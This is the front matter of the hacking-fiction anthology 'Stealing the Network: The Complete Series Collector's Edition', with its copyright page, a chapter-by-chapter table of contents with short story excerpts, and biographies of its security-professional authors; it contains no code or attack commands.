While not a complete reference, these security laws can provide you with a foundation of knowledge to prevent criminal hackers from stealing your network… Part II ● How to Own a Contine
Trang 2Stealing the Network
Trang 4Stealing the Network: The Complete Series Collector’s Edition
Ryan Russell
Timothy Mullen
Johnny Long
AMSTERDAM • BOSTON • HEIDELBERG • LONDON •
NEW YORK • OXFORD PARIS • SAN DIEGO • SAN FRANCISCO •
SINGAPORE • SYDNEY • TOKYO
Trang 5Stealing the Network: The Complete Series Collector’s Edition, Final Chapters, and DVD
Copyright © 2009, Elsevier Inc All rights reserved.
No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form
or by any means, electronic, mechanical, photocopying, recording, or otherwise, without the prior written permission of the publisher
Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception that the program listings may be entered, stored, and executed in a computer system, but they may not be reproduced for publication.
Library of Congress Cataloging-in-Publication Data
1 Computer hackers—Fiction 2 Computer security—Fiction 3 Cyberterrorism—Fiction.
4 Short stories, American—21st century I Mullen, Timothy M II Long, Johnny III Title
PS648.C65R87 2009
813'.6—dc22
2008055578
British Library Cataloguing-in-Publication Data
A catalogue record for this book is available from the British Library.
ISBN: 978-1-59749-299-7
For information on all syngress publications
visit our web site at www.syngress.com
Printed in the United States of America
09 10 11 12 13 10 9 8 7 6 5 4 3 2 1
Elsevier Inc., the author(s), and any person or fi rm involved in the writing, editing, or production (collectively “Makers”) of this book (“the Work”) do not guarantee or warrant the results to be
obtained from the Work.
For information on rights, translations, and bulk sales, contact Matt Pedersen, Commercial Sales Director and Rights; email m.pedersen@elsevier.com
Publisher: Laura Colantoni Acquisitions Editor: Rachel Roumeliotis
Development Editor: Mathew Cater Project Manager: Andre Cuello
Trang 6PART I ● How to Own the Box
Foreword Jeff Moss
CHAPTER 1 Hide and Sneak Ido Dubrawsky 7
If you want to hack into someone else’s network, the week between Christmas
and New Year’s Day is the best time I love that time of year No one is around,
and most places are running on a skeleton crew at best If you’re good, and you
do it right, you won’t be noticed even by the automated systems And that was
a perfect time of year to hit these guys with their nice e-commerce site—plenty
of credit card numbers, I fi gured
The people who ran this site had ticked me off I bought some computer
hard-ware from them, and they took forever to ship it to me On top of that, when
the stuff fi nally arrived, it was damaged I called their support line and asked
for a return or an exchange, but they said that they wouldn’t take the card back
because it was a closeout Their site didn’t say that the card was a closeout!
I told the support drones that, but they wouldn’t listen They said, “Policy is
policy,” and “Didn’t you read the fi ne print?” Well, if they’re going to take that
position… Look, they were okay guys on the whole They just needed a bit of
a lesson That’s all
CHAPTER 2 The Worm Turns Ryan Russell and Timothy Mullen 23
After a few hours, I’ve made a tool that seems to work Geeze, it’s 4:30 A.M I
mail the cleanup tool to the list for people to try
It’s tempting to use the root.exe and make the infected boxes TFTP down my
tool and fi x themselves Maybe, by putting it out there, some idiot will
vol-unteer himself Otherwise, the tool won’t do much good, since the damage is
already done I’m showing about 14,000 unique IPs in my logs so far Based
on previous worms, that usually means there are at least 10 times as many
infected My little home range is only fi ve IP addresses
I decide to hack up a little script that someone can use to remotely install my
fi x program, using the root.exe hole That way, if someone wants to fi x some
of their internal boxes, they won’t need to run around to the consoles Then I
go ahead and change it to do a whole range of IP addresses, so admins can use
it on their whole internal network at once When everyone gets to work
tomor-row, they’re going to need all the help they can get I do it in C, so I can
com-pile it to an .exe, since most people won’t have the Windows Perl installed
Contents
Trang 7CHAPTER 3 Just Another Day at the Offi ce Joe Grand 41
I can’t disclose much about my location Let’s just say it’s damp and cold But it’s much better to be here than in jail, or dead I thought I had it made—sim-ple hacks into insecure systems for tax-free dollars And then the ultimate heist: breaking into a sensitive lab to steal one of the most important weapons the U.S had been developing And now it’s over I’m in a country I know noth-ing about, with a new identity, doing chump work for a guy who’s fresh out of school Each day goes by having to deal with meaningless corporate policies and watching employees who can’t think for themselves, just blindly following orders And now I’m one of them I guess it’s just another day at the offi ce.CHAPTER 4 h3X’s Adventures in Networkland FX 63
h3X is a hacker, or to be more precise, she is a hackse (from hexe, the German
word for witch) Currently, h3X is on the lookout for some printers Printers are the best places to hide fi les and share them with other folks anonymously And since not too many people know about that, h3X likes to store exploit codes and other kinky stuff on printer, and point her buddies to the web serv-ers that actually run on these printers She has done this before…
CHAPTER 5 The Thief No One Saw Paul Craig 103
My eyes slowly open to the shrill sound of my phone and the blinking LED in
my dimly lit room I answer the phone
“Sure, but what’s the target? And when is it due out?”
“Digital Designer v3 by Denizeit It was announced being fi nal today and ping by the end of the week, Mr Chou asked for this title personally It’s good money if you can get it to us before it’s in the stores There’s been a fair bit of demand for it on the street already.”
ship-“Okay, I’ll see what I can do once I get some damn coffee.”
“Thanks dude I owe you.” There’s a click as he hangs up
CHAPTER 6 Flying the Friendly Skies Joe Grand 119Not only am I connected to the private wireless network, I can also access the Internet Once I’m on the network, the underlying wireless protocol is trans-parent, and I can operate just as I would on a standard wired network From a hacker’s point of view, this is great Someone could just walk into a Starbucks, hop onto their wireless network, and attack other systems on the Internet, with
Trang 8Contents vii
hardly any possibility of detection Public wireless networks are perfect for
retaining your anonymity
Thirty minutes later, I’ve fi nished checking my e-mail using a secure web mail
client, read up on the news, and placed some bids on eBay for a couple of rare
1950’s baseball cards I’ve been looking for I’m bored again, and there is still half
an hour before we’ll start boarding the plane
CHAPTER 7 dis-card Mark Burnett 129
One of my favorite pastimes is to let unsuspecting people do the dirty work for
me The key here is the knowledge that you can obtain through what I call social
reverse-engineering, which is nothing more than the analysis of people What can
you do with social reverse-engineering? By watching how people deal with
com-puter technology, you’ll quickly realize how consistent people really are You’ll
see patterns that you can use as a roadmap for human behavior
Humans are incredibly predictable As a teenager, I used to watch a late-night
TV program featuring a well-known mentalist I watched as he consistently
guessed social security numbers of audience members I wasn’t too impressed
at fi rst—how hard would it be for him to place his own people in the
audi-ence and play along? It was what he did next that intrigued me: He got the
TV-viewing audience involved He asked everyone at home to think of a
veg-etable I thought to myself, carrot To my surprise, the word CARROT suddenly
appeared on my TV screen Still, that could have been a lucky guess
CHAPTER 8 Social (In)Security Ken Pfeil 143
While I’m not normally a guy prone to revenge, I guess some things just rub
me the wrong way When that happens, I rub back—only harder When they
told me they were giving me walking papers, all I could see was red Just who
did they think they were dealing with anyway? I gave these clowns seven years
of sweat, weekends, and three-in-the-morning handholding And for what? A
lousy week’s severance? I built that IT organization, and then they turn around
and say I’m no longer needed They said they’ve decided to “outsource” all of
their IT to ICBM Global Services…
The unemployment checks are about to stop, and after spending damn near a
year trying to fi nd another gig in this economy, I think it’s payback time Maybe
I’ve lost a step or two technically over the years, but I still know enough to hurt
these bastards I’m sure I can get some information that’s worth selling to a
competitor, or maybe get hired on with them And can you imagine the looks
on their faces when they fi nd out they were hacked? If only I could be a fl y on
the wall
CHAPTER 9 BabelNet Dan Kaminsky 157
Black Hat Defense: Know Your Network Better Than the Enemy Can
Afford To…
SMB, short for Server Message Block, was ultimately the protocol behind NBT
(NetBIOS over TCP/IP), the prehistoric IBM LAN Manager, heir-apparent CIFS,
and the most popular data-transfer system in the world short of e-mail and the
Trang 9Web: Windows fi le sharing SMB was an oxymoron—powerful, fl exible, fast,
supported almost universally, and fucking hideous in every way shape and byte.
Elena laughed as chunkage like ECFDEECACACA-CACACACACACACACACACA spewed across the display
Once upon a time, a particularly twisted IBM engineer decided that this First
Level Encoding might be a rational way to write the name BSD Humanly
readable? Not unless you were the good Luke Kenneth Casson Leighton, co-author of the Samba UNIX implementation, whose ability to fully grok raw SMB from hex dumps was famed across the land, a postmodern incarnation of sword-swallowing
CHAPTER 10 The Art of Tracking Mark Burnett 175It’s strange how hackers’ minds work You might think that white hat hackers would be on one end of the spectrum and black hat hackers on the other On the contrary, they are both at the same end of the spectrum, with the rest of the world on the other end There really is no difference between responsible hacking and evil hacking Either way, it’s hacking The only difference is the content Perhaps that’s why it’s so natural for a black hat to go white, and why it’s so easy for a white hat to go black The line between the two is fi ne, mostly defi ned by ethics and law To the hacker, ethics and laws have holes, just like anything else
Many security companies like to hire reformed hackers The truth is that there
is no such thing as a reformed hacker These hackers may have their focus rected and their rewards changed, but they are never reformed Getting paid to hack doesn’t make them any less of a hacker
redi-Hackers are kind of like artists Artists will learn to paint by painting whatever they want They could paint mountains, animals, or nudes They can use any medium, any canvas, and any colors they wish If the artist someday gets a job producing art, she becomes a commercial artist The only difference is that now she paints what other people want
Appendix: The Laws of Security Ryan Russell 199This book contains a series of fi ctional short stories demonstrating criminal hacking techniques that are used every day While these stories are fi ctional, the dangers are obviously real As such, we’ve included this appendix, which discusses how to mitigate many of the attacks detailed in this book While not
a complete reference, these security laws can provide you with a foundation of
knowledge to prevent criminal hackers from stealing your network…
Part II ● How to Own a Continent
Foreword Jeff Moss
CHAPTER 11 Control Yourself Ryan Russell as “Bob Knuth” 227How much money would you need for the rest of your life? How much would you need in a lump sum so that you never had to work again, never had to
Trang 10Contents ix
worry about bills or taxes or a house payment? How much to live like a king?
Your mind immediately jumps to Bill Gates or Ingvar Kamprad with their
billions You think that is what you would need…
CHAPTER 12 The Lagos Creeper Box 131ah as “Charlos” 241
Nigeria was a dump Charlos now understood why nobody wanted to work
there It’s Africa like you see it on CNN And yet this was the country that
had the largest oil reserve on the continent Military rule for the past 30 years
ensured that the money ended up mostly in some dictator’s pocket and not on
the streets where it belonged…
CHAPTER 13 Product of Fate: The Evolution of a Hacker Russ Rogers as
“Saul” 255
Looking back on the entire event, no one could really say how everything
ended up the way it did Saul has always done well in school And though his
parents might not have been the greatest people on the planet, it’s not like
they didn’t love him So, what could have enticed a bright, seemingly normal
kid like Saul into committing such a heinous crime? No one knows But, then
again, no one knows what really happened, do they?…
CHAPTER 14 A Real Gullible Genius Jay Beale as “Flir” 281
CIA agent Knuth had been very insistent when he recruited Flir He needed
per-sonal student information, including social security numbers, and, as an agent
for a non-domestically focused intelligence agency, didn’t have the authority
to get such from the U.S government He did, on the other hand, have the
authority to get Flir complete immunity for any computer crimes that did not
kill or physically injure anyone The letter the agent gave Flir was on genuine
CIA letterhead and stated both the terms of the immunity and promised Flir
signifi cant jail time if he disclosed any details about this mission
CHAPTER 15 For Whom Ma Bell Tolls Joe Grand as “The Don” 325
The sun had already sunk beyond the harbor as Don Crotcho woke up He
nei-ther noticed nor cared It had been a little more than a year since his fl ight
from Boston after a successful theft of the United States’ next-generation stealth
landmine prototype, and he had been enjoying his self-prescribed seclusion in
this land of fi re and ice…
CHAPTER 16 Return on Investment Fyodor as “Sendai” 351
Like many professional penetration testers, Sendai was not always the
whole-some “ethical hacker” described in his employer’s marketing material In his
youth, he stepped well over the line between questionable (grey hat) and fl at-out
illegal (black hat) behavior Yet he never felt that he was doing anything wrong…
CHAPTER 17 h3X and The Big Picture FX as “h3X” 379
h3X paints a picture Actually, she doesn’t really paint but rather just creates a plain
white canvas of 256 by 512 pixels in Microsoft Paint, because you can hardly
do more with that program than the equivalent of the childish drawings young
Trang 11parents hang on the walls of their cubicles to scare away art-interested managers
The reason h3X does create the picture is not for the artistic content but rather for
the fi le format created when she clicks on Save as… in the menu The white box
becomes a data fi le with the extension bmp, and that’s what she is after…
CHAPTER 18 The Story of Dex Paul Craig as “Dex” 417The dim light fi lls the room with a dull, eerie glow, and in the midst of the paper-work-fi lled chaos sits one man His eyes riveted to two computer screens simul-taneously; a cold emotionless expression fi lls his tired caffeine-fueled face Pizza boxes and bacterially active coffee cups litter his New York apartment…
CHAPTER 19 Automatic Terror Machine Timothy Mullen as “Matthew” 455Matthew regarded Capri—she was absolutely beautiful His eyes followed her movements through a haze of smoke She danced with a natural grace and style that many of the dancers there envied, and delivered a body of such perfection and tone that all the men there wanted her And yet, by some remarkable grace
of fate, she was with him, “his girl,” as she would say As he watched her on stage, he wondered what it was that she saw in him He wasn’t the world’s best looking guy, and he hadn’t always been the most honest person in the world, but these days he did have a solid job, and he was making some money That was probably it, and though it kind of bothered him, he knew that was some-thing a lot of people didn’t have, particularly in the area of South Africa where
he lived…
CHAPTER 20 Get Out Quick Ryan Russell as “Bob Knuth” 471Dawn, April 15th It takes me an hour and a half to walk to the Greyhound bus station in town I buy a ticket for Las Vegas; it’s the next bus to leave that goes
to one of my cities, which seems somehow appropriate I have a 40 minute wait in the station until my bus boards The ride to Las Vegas will take most
of the day I peruse the newsstand at the station and buy a paper and a Tom Clancy novel
Part III ● How to Own an Identity
Foreword Anthony Reyes
Section I: Evasion
Prologue: From the Diary of Robert Knoll, Senior Ryan Russell
My name, my real name, is Robert Knoll, Senior No middle name Most of those that matter right now think of me as Knuth But I am the man of a thousand faces, the god of infi nite forms
Identity is a precious commodity In centuries past, those who fancied selves sorcerers believed that if you knew a being’s true name, you could con-trol that being Near where I live now, there are shamans that impose similar beliefs on their people The secret is that if you grant such a man, an agency, this power over yourself through your beliefs or actions, then it is true
Trang 12them-Contents xi
CHAPTER 21 In the Beginning… Ceazar as “The Woman with No Name” 489
Looking over her shoulder in the terminal, she decided fi nally to give into the
need to rest Long-ignored memories fl ooded across her closed eyes, drew her
back into meditation and a thousandth review of her oldest project
In days long past, she built her fi rst power base by transferring pirated
soft-ware into the States from Europe Since the day she returned from her fi rst
world tour, she only pretended to operate without a safety net She slept like a
baby in the worst circumstance because she could always fall back onto Plan B
When she found a knot of stress, she meditated by replaying that fi rst big trip
and the get out of jail free card she had created….
CHAPTER 22 Sins of the Father Ryan Russell as “Robert” 501
The young man stood holding the handle of his open front door, looking at
two men in dark suits on his porch “So, who are you this time? FBI again?”
“Uh, I’m Agent Comer with the United States Secret Service, and this is…” As
Agent Comer turned, the young man cut him off
“Secret Service Well, come on in!” he said, with a tone that could only be
interpreted as mock enthusiasm He left the front door swung wide, and strode
down the entry hall, his back to the two agents The two agents looked at each
other, and Agent Comer motioned his partner inside As they stepped past the
threshold, Agent Comer quietly closed the front door behind him
CHAPTER 23 Saul on the Run Chris Hurley as “Saul” 525
Dan Smith shuddered as he re-read the report that Simon Edwards, the security
auditor, had submitted
Dear Sirs:
I have been called upon by my fi rm (on behalf of St James
hospital) to investigate the possible wireless compromise
detected, which has continued for the past three or four weeks.
CHAPTER 24 The Seventh Wave Timothy Mullen as “Ryan” 551
“Eleven,” answered Ryan, the stress evident in her voice “Maybe even a 12.”
On the other end of the phone was Daniela, Ryan’s friend and fellow dancer
“Come on, Capri, is it really that bad?” Though Daniela knew Capri was just
Ryan’s stage name, she used the bogus alias anyway—the concern in her voice
no less genuine Having known Ryan for more than a year now, she knew her
friend was not prone to exaggeration And given that the question Daniela
asked Ryan was “How bad is it on a scale of one to ten?” she was worried
CHAPTER 25 Bl@ckToW3r Brian Hatch as “Glenn” 571
I have no idea if Charles is a hacker Or rather, I know he’s a hacker; I just don’t
know if he wears a white or black hat
Anyone with mad skills is a hacker—hacker is a good word: it describes an
inti-mate familiarity with how computers work But it doesn’t describe how you
apply that knowledge, which is where the old white-hat/black-hat bit comes
Trang 13from I still prefer using “hacker” and “cracker,” rather than hat color If you’re hacking, you’re doing something cool, ingenious, for the purposes of doing it
If you’re cracking, then you’re trying to get access to resources that aren’t yours Good versus bad Honorable versus dishonest
CHAPTER 26 The Java Script Café Raven Alder as “Natasha” 595Natasha smiled winningly as she prepared a double-caramel latte, 2 percent milk, no whipped cream The entrepreneurial customer across the counter smiled back with perfect white teeth
“It’s really amazing that you can do this!” he enthused “I didn’t have to say a word.”
“Well, with our custom biometric systems, we can remember everyone’s lar order and get it perfect every time,” Natasha said “That’s the technological wave of the future.”
regu-CHAPTER 27 Death by a Thousand Cuts Johnny Long
with Anthony Kokocinski 605Knuth was a formidable opponent He was ultra-paranoid and extremely careful He hadn’t allowed his pursuers the luxury of traditional “smoking gun” evidence No, Knuth’s legacy would not suffer a single deadly blow; if it was to end, it would be through a death by a thousand tiny cuts
CHAPTER 28 A Really Gullible Genius Makes Amends
Jay Beale as “Flir” 649Flir had screwed up He had royally screwed up He’d stolen over 40,000 social security numbers, names, and addresses from his college’s class registration system If that wasn’t bad enough, he’d been fooled into over-nighting them
to the Switzerland address that Knuth had given him He’d sealed their fate yesterday with that damned FedEx envelope!
If only he’d known yesterday what he knew now, maybe he’d have done the right thing Flir mulled it over as the panic set in
CHAPTER 29 Near Miss Tom Parker as “Carlton” 669
I had been with the agency for almost eight months, most of which I had spent learning my way about the agency and re-arranging what I had left of my per-sonal life As fulfi lling as my role at my previous employer had been, I had become heavily involved in several computer crime investigations The agency decided that I was “their guy” for heading up any investigation that involved anything with a transistor in it, and I decided that it was time for a change.CHAPTER 30 There’s Something Else Johnny Long
with Anthony Kokocinski 697Joe stood in his bathroom, faced the mirror, and adjusted his tie Either his tie was straight, or he was really tired He was running late for work, and normally
he would have been anxious, but he didn’t get out of the offi ce until 11:34 last
Trang 14Contents xiii
night As his thoughts about his pile of casework meandered through his mind,
his Motorola two-way pager sprang to life Instinctively, he reached for it Pages
like this dictated days, weeks, and sometimes months of his life
8:34 a.m.: Pack for sleepover Team work-up pending.
CHAPTER 31 Epilogue—The Chase Johnny Long 713
As I left the roadside diner, I felt entirely confi dent that Agent Summers was
going to need my help eventually He was obviously not a fi eld agent, and I
decided I would hang around and monitor him from a safe distance, at least
until his team showed up I pulled a U-turn a long way down the highway and
parked in a lot outside a run-down strip mall I reached into the back seat,
found my tactical bag, and opening it quickly found my trusty 4Gen AMT night
vision binoculars I focused them quickly and instinctively on Summer’s car
He was not inside the vehicle I quickly scanned the parking lot, and saw him
approaching the diner I was fl abbergasted He was going into the diner!
“What’s he thinking?” I muttered
Section II: Behind the Scenes
CHAPTER 32 The Conversation Jeff Moss as “Tom” 721
When Timothy Mullen came up with the idea for this book during dinner at
the Black Hat conference last year, I was pleased to be asked to contribute a
chapter When it came time for me to actually write it, I realized I was at a
dis-advantage I hadn’t created characters for the previous books, so my
contribu-tion would have to be fresh There was the temptacontribu-tion to create a story around
an uber-haxor with nerves of steel, the time to plan, and skills to execute Such
a character would have given me the most fl exibility as a writer After a 16-page
false start about a small business owner, a bicycle community portal, and the
ever-present Russian Mafi a, my fi rst draft hit too many logical problems, and
I decided to go in a different direction
CHAPTER 33 Social Insecurity Timothy Mullen 747
There is a reason that identity theft is the fastest growing crime in the world:
It’s easy
The fact that you are reading this indicates that you are probably technical in
nature, or at least security-minded, with an above average intelligence Why
else would you be interested in a book like this?
But the typical human engaged in identity theft is not While the upper
ech-elon may indeed have some skills, most likely they have attained the product
of their crime because of someone else’s lax security, or through a broker These
people are criminals, and criminals for a reason: They are lazy, and want to do
things the easy way It’s the age-old algorithm: Lazy Criminals ⫹ Easy Money ⫽
Crime Spree
Trang 15Part IV ● How to Own a Shadow
Foreword Timothy Mullen
CHAPTER 34 Travel Plans 753When he was 16 years old, Bobby ran away from home Thinking back on it,
he couldn’t believe how stupid and nạve he had been He had left home to
be a full-time cracker, the kind that broke copy protection on software; in his early teens, he built a reputation as a hotshot game cracker He had progressed from using canned copy programs to making duplicates of trick discs on 8-bit machines to understanding and modifying machine code on DOS machines
It hadn’t hurt any that his dad always had the latest equipment and manuals
at home His resources also included access to numerous communications works, including early Internet dial-up, though he didn’t fully appreciate it at the time His dad encouraged his learning and exploring
net-CHAPTER 35 Back in the Saddle 775
A noise woke Robert He sat up and his head throbbed in response The noise again; it was coming from the bed He ran his hands through the sheets and covers, and came up with his phone
“Hello?”
“Hey, muchacho! It’s Miguel You still sleeping? It’s 11:00 You ready to come
in to the offi ce?” Miguel sounded far too enthusiastic for having been out as late as they both were Maybe Miguel hadn’t drunk quite as much as he had
He could faintly recall Miguel having the limo pick them up after they left the Blue Marlin, and being delivered to his new place This must be the new place
He was still wearing his clothes from yesterday
CHAPTER 36 Old Man and a Ghost 803
At any other time, Derek probably would have recognized her straight off But he had just spent what seemed like days tracking Knuth nonstop halfway across the country with little or no rest He had watched as Agent Summers met with Knuth, only to let him go From a diner, then on a bus, throughout Las Vegas, and even on a plane to LAX, he had been trailing Knuth only to see him walk away He was completely burned out and he just didn’t get what was going on
She was somewhat disappointed that he didn’t get it yet “Looks like you’re ting a bit too old for this kind of thing, Derek.”
get-CHAPTER 37 Rootkit 809What good does it do a man to build an empire if it crumbles when he is gone?
If his empire is to thrive, if it is to be worth building, then he must have an heir Someone whose destiny it is to carry forth the empire, and continue it for themselves and beyond Someday, you will read this and I hope that by then you will understand
Trang 16Contents xv
An heir is not simply a child, a descendent An heir continues the work of the
father To truly embody an empire rather than be a parasite, you need to be
able to wear the mantle of emperor
CHAPTER 38 Paul 827
After a frightening, hour-long session in front of the computer, Paul pushed
him-self away from the desk suddenly and began shaking his head violently Back
and forth and back and forth, like he was trying to shake bugs out of his ears
His heart raced and he was drenched with sweat His hands were trembling,
his nose was running, and his eyes burned He stood up, wobbled, and caught
his balance The vertigo was unbearable It reminded him of the Declaration of
Independence incident in History class He sat back down, closed his eyes, and
took deep breaths, desperately waiting for the world to settle back down
CHAPTER 39 The Birth of Pawn 869
<Paul> I just want to learn.
<Paul> That SSH server was incredible.
<Paul> I have never even seen a Linux machine before tonight,
but
<Paul> It was fascinating.
<Paul> It was more than that It was incredible.
CHAPTER 40 Dishonorable Discharge 937
Pawn’s Ninjutsu black belt hung on the wall of his basement dojo next to his
Taijutsu black belt, which now sported a second-degree stripe Other than that,
the room looked much the same as it always had But all was not as it had
been
CHAPTER 41 McGaylver 1003
Gayle was keenly aware that Pawn was a “special” person, but she had no idea
how he would react in a fl ight situation She’d seen fi eld agents lose their cool
under pressure Having no idea as to the source of Pawn’s pseudo-autistic
condition, she had to be careful she didn’t set him off She had to make sure
that she controlled the situation and that she could properly control him She
didn’t want him snapping and doing to her what he did to those two federal
agents And if circumstances dictated, she might need him to do something
like that again under her direction
CHAPTER 42 The Final Chapter .1019
The man sometimes known as Knuth, sometimes as Robert Kline, and
some-times “dad” didn’t look particularly pleased at the news Miguel knew quite a
bit about Mr Robert Kline Sr.’s operational plans; he ran his operations at Kline
Networks This meant that he knew the plans for the Player2Player casino, both
above board and below One thing Miguel did not know, however, was why he
was so interested in activity from this particular list of networks and
geogra-phies Many of them were obvious: governments, spy organizations, military,
law enforcement, security companies, certain ISPs, and competitors
Trang 18AUTHORS AND TECHNICAL EDITORS
Johnny Long: How to Own an Identity: Author of Chapters 27 and 30, and the Epilogue;
Technical Editor How to Own a Shadow: Author, Primary Character: Pawn; Technical
Editor.
Who’s Johnny Long? Johnny is a Christian by grace, a family guy by choice, a professional
hacker by trade, a pirate by blood, a ninja in training, a security researcher and author His
home on the web is http://johnny.ihackstuff.com
(From How to Own a Shadow): This page can support only a fraction of all I am thankful for Thanks
fi rst to Christ without whom I am nothing Thanks to Jen, Makenna, Trevor and Declan You guys pay
the price when deadlines hit, and this book in particular has taken me away from you for far too long
Thanks for understanding and supporting me You have my love, always.
Thanks to Andrew and Christina (awesome tech edit) and the rest of my Syngress family Thanks to
Ryan Russell (Blue Boar) for your contributions over the years and for Knuth What a great character!
Thanks to Tim “Thor” Mullen We work so well together, and your great ideas and collaborative
contributions aside, you are a great friend.
Thanks to Scott Pinzon for the guidance and editorial work Your contribution to this project has
literally transformed my writing.
Thanks to Pawn If I have my say, we’ll meet again.
Thanks to the johnny.ihackstuff.com mods (Murf, Jimmy Neutron, JBrashars, CP Klouw, Sanguis,
The Psyko, Wolveso) and members for your help and support Thanks to the RFIDeas for the support,
and to Pablos for the RFID gear Thanks to Roelof and Sensepost for BiDiBLAH, to NGS for the great
docs, to nummish and xeron for Absinthe.
Thanks to everyone at the real Mitsuboshi dojo, including Shidoshi and Mrs Thompson,
Mr Thompson, Mr Stewart, Mrs McCarron, Mrs Simmons, Mr Parsons, Mr Birger, Mr Barnett,
Ms Simmons, Mr Street, Mrs Hebert, Mrs Kos, Mrs Wagner and all those not listed on the offi cial
instructor sheet.
Shouts: Nathan “Whatever” Bowers, Stephen S, Mike “Sid A Biggs”, John Lindner, Chaney, Jenny
Yang, Security Tribe, the Shmoo Group, Sensepost, Blackhat, Defcon, Neal Stephenson (Baroque),
Stephen King (On Writing), Ted Dekker (Thr3e), Project 86, Shadowvex, Green Sector, Matisyahu,
Thousand Foot Krutch, KJ-52 (Slim Part 2) To Jason Russell, Bobby Bailey and Laren Poole for the
Invisible Children movement (http://www.invisiblechildren.com)
Author Biographies
Trang 19Timothy (Thor) Mullen: Created concept for this book How to Own the Box: Contributing Author How to Own a Continent: Author of Chapter 19, Primary Character: Matthew How to Own an Identity: Author of Chapters 24 and 33, Primary Character: Ryan How to Own a Shadow: Author, Primary Character: Gayle; Technical Editor.
Thor has been educating and training users in the technology sector since 1983 when he began teaching BASIC and COBOL through a special educational program at the Medical University of South Carolina (while still a high school senior) He then launched his profes-sional career in application development and network integration in 1984 Timothy is now CIO and Chief Software Architect for Anchor Sign, one of the 10 largest sign-system manu-facturers in America He has developed and implemented Microsoft networking security solu-tions for institutions like the US Air Force, Microsoft, the US Federal Courts, regional power plants, and international banking/fi nancial institutions He has developed applications rang-ing from military aircraft statistics interfaces and biological aqua-culture management to nuclear power-plant effects monitoring for private, government, and military entities Timothy
is currently being granted a patent for the unique architecture of his payroll processing engine used in the AnchorIS accounting solutions suite
Timothy has been a columnist for Security’s Focus’ Microsoft section, and is a regular
contrib-utor of InFocus technical articles Also known as “Thor,” he is the founder of the “Hammer of the God” security co-op group His writings appear in multiple publications such as Hacker’s
Challenge, the Stealing the Network series, and in Windows XP Security His security tools,
tech-niques and processes have been featured in Hacking Exposed and New Scientist Magazine, as
well as in national television newscasts and technology broadcasts His pioneering research in
“strikeback” technology has been cited in multiple law enforcement and legal forums,
includ-ing the International Journal of Communications Law and Policy.
Timothy holds MCSE certifi cations in all recent Microsoft operating systems, has pleted all Microsoft Certifi ed Trainer curriculums and is a Microsoft Certifi ed Partner He is
com-a member of Americcom-an Menscom-a, com-and hcom-as recently been com-awcom-arded the Microsoft “Most Vcom-alucom-able Professional” (MVP) award in Windows Security for the second straight year
(From How to Own a Shadow): I would like to say thanks to Andrew for all his patience and support
during the creation of this, the fourth book in our Stealing series I know it’s been tough, but we did it You rock Thanks for letting me be me.
To Ryan Russell, thanks for the hard work I really appreciate it, even though I bet you won’t thank me for anything in your damn bio! Four books together! Whoda thunk?
And J-L0, man, what a good time As always, a great time working with you through the wee hours of the night talking tech and making stuff up I smell a movie in our future!
I’d like to give a big thanks to Scott Pinzon, who totally came through for us You’ve made a big ence in our work, sir And thanks to Christine for the hard work on the back end Hope I didn’t ruin your holidays ;).
differ-Thanks to the “real” Ryan from Reno who helped spark this whole thing so many years ago I have
no idea where you are now, but I hope you’ve got everything you want Shout-outs to Tanya, Gayle, Christine, Tracy, Amber, and my “family” at ‘fl ings.
Trang 20Author Biographies xix
Ryan Russell (aka Blue Boar): How to Own the Box: Technical Editor How to Own a Continent:
Author of Chapters 1 and 10, Primary Character: Robert Knuth; Technical Editor How to Own
an Identity: Author of Prologue and Chapter 22, Primary Characters: Robert Knoll, Sr (Knuth)
and Robert Knoll, Jr How to Own a Shadow: Veteran author, Primary Characters: Robert
Knuth and Bobby Knuth, Jr.; Technical Editor.
Ryan has worked in the IT fi eld for over 20 years, focusing on information security for the last
13 He was the lead author of Hack Proofi ng Your Network, Second Edition (Syngress, ISBN:
978-1-92899-470-1), contributing author and technical editor of Stealing the Network series, and is
a frequent technical editor for the Hack Proofi ng series of books from Syngress Ryan was also
a technical advisor on Snort 2.0 Intrusion Detection Ryan founded the vuln-dev mailing list
and moderated it for three years under the alias “Blue Boar.” He is a frequent lecturer at
secu-rity conferences and can often be found participating in secusecu-rity mailing lists and web site
discussions Ryan is the Director of Information Security at BigFix, Inc
CONTRIBUTING AUTHORS
131ah: How to Own a Continent: Contributing Author of Chapter 12, Primary Character:
Charlos.
131ah is the technical director and a founding member of an IT security analysis company After
completing his degree in electronic engineering, he worked for four years at a software
engi-neering company specializing in encryption devices and fi rewalls After numerous “typos” and
“fi nger trouble,” which led to the malignant growth of his personnel fi le, he started his own
company along with some of the country’s leaders in IT security Here, 13ah heads the Internet
Security Analysis Team, and in his spare time plays with (what he considers to be) interesting
concepts such as footprint and web application automation, worm propagation techniques,
covert channels//Trojans and cyber warfare 131ah is a regular speaker at international conferences including Black Hat Briefi ngs, DEFCON, RSA, FIRST and Summercon He gets
his kicks from innovative thoughts, tea, drinking, lots of bandwidth, learning cool new stuff,
Camels, UNIX, fi ne food, 3 A.M creativity, and big screens 131ah dislikes conformists, papaya,
suits, animal cruelty, arrogance, and dishonest people or programs
Raven Alder: How to Own an Identity: Contributing Author of Chapter 26, Primary
Character: Natasha.
Raven Alder is a Senior Security Engineer for Nexum, Inc She specializes in scalable
enterprise-level security, with an emphasis on defense in depth She designs large-sale fi rewall and IDS
sys-tems, and then performs vulnerability assessments and penetration tests to make sure they are
performing optimally In her copious spare time, she teaches network security for LinuxChix
org and checks cryptographic vulnerabilities for the Open Source Vulnerability Database Raven
lives in Seattle, Washington Raven was a contributor to Nessus Network Auditing.
Jay Beale: How to Own a Continent: Contributing Author of Chapter 14, Primary Character:
Flir How to Own an Identity: Contributing Author of Chapter 28, Primary Character: Flir.
Jay Beale is an information security specialist, well known for his work on mitigation
technol-ogy, specifi cally in the form of operating system and application hardening He’s written two
Trang 21of the most popular tools in this space: Bastille Linux, a lockdown tool that introduced a vital security-training component, and the Center for Internet Security’s Unix Scoring Tool Both are used worldwide throughout private industry and government Through Bastille and his work with CIS, Jay has provided leadership in the Linux system hardening space, participating in efforts to set, audit, and implement standards for Linux/Unix security within industry and gov-ernment He also focuses his energies on the OVAL project, where he works with government and industry to standardize and improve the fi eld of vulnerability assessment Jay is also a mem-ber of the Honeynet Project, working on tool development.
Jay has served as an invited speaker at a variety of conferences worldwide, as well as government
symposia He’s written for Information Security Magazine, SecurityFocus, and the now-defunct
SecurityPortal.com He has worked on fi ve books in the information security space Three of
